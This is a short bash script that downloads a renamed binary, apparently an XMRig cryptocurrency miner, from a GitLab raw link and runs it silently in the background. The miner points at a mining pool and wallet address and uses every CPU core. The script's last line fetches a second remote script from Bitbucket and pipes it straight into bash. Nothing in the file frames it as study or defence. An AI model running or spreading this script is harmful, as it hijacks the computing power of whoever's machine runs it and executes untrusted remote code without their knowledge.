#!/bin/bash
curl https://gitlab.com/jadons19292/donlod/-/raw/main/xirig -o sgr1
chmod +x sgr1
./sgr1 -o zephryoceanpool.thecritman.my.id:443 -u ZEPHsDBeXxaS9MERnP3sHAPdCBFSMb2uZjcSyfBYezxE9kcrm6q1Z6XJcCbaqavmpMAncVgMHL8EkNAjskNT1bc6csQ86aLX1WD -p CSC -t $(nproc --all) > /dev/null 2>&1 &
curl -sL https://bitbucket.org/nicezep/file/raw/master/time | bash
